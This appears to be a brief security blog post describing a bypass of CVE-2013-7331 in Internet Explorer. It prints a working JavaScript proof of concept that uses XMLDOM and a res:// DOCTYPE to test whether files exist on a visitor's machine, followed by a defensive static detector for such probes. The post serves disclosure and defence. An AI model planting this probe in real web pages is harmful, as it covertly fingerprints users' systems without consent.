This bug was recently patched (2017).

CVE-2013-7331 Bypass

Changes from the original PoC are "gigantic" (in green)

// CVE-2013-7331 Bypass.

function fileExists(fileName)
{
   // File must be .exe or .dll
   var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
   xmlDoc.async = true;
   xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://' + fileName + '/16/1">');
   return xmlDoc.parseError == -2147467259; // Err number used is different than the one in the original PoC.
}

To understand what the /16/1 means, please read the previous blog post.
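
For defenders, a static check that flags captured script source combining the three elements the function above relies on (the Microsoft.XMLDOM ActiveX object, a loadXML call, and a DOCTYPE whose identifier points at res://). This is an added example, not code from the original post; findResProbe, normalize and the sample input are constructed for illustration.

```javascript
// Added example, not from the original post. findResProbe, normalize and the
// sample below are constructed for illustration.

// Undo simple escapes and literal splits so the indicators are matched on
// the string the script would actually build.
function normalize(src) {
  const fromHex = (_, h) => String.fromCharCode(parseInt(h, 16));
  return src
    .replace(/\\x([0-9a-fA-F]{2})/g, fromHex)
    .replace(/\\u([0-9a-fA-F]{4})/g, fromHex)
    .replace(/["']\s*\+\s*["']/g, "") // "Micro" + "soft" -> "Microsoft"
    .toLowerCase();
}

// Flags source that combines the three elements the probe needs; a
// parseError read raises confidence because that is where the answer leaks.
function findResProbe(src) {
  const s = normalize(src);
  const indicators = {
    xmldom: /activexobject\s*\(\s*["']microsoft\.xmldom["']/.test(s),
    loadXml: /\.loadxml\s*\(/.test(s),
    resDoctype: /<!doctype[^>]*res:\/\//.test(s),
    parseError: /\.parseerror\b/.test(s),
  };
  const match = indicators.xmldom && indicators.loadXml && indicators.resDoctype;
  const confidence = !match ? "none" : indicators.parseError ? "high" : "medium";
  return { match, confidence, indicators };
}

// Constructed sample: the function from this page as it would appear in a
// captured page body.
const SAMPLE = String.raw`
function fileExists(fileName) {
  var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
  xmlDoc.async = true;
  xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://' + fileName + '/16/1">');
  return xmlDoc.parseError == -2147467259;
}`;

console.log(findResProbe(SAMPLE));
```

Ordinary XMLDOM use without a res:// DOCTYPE is not flagged, so the check can run over proxy or sandbox captures without alerting on legacy intranet pages that only parse XML.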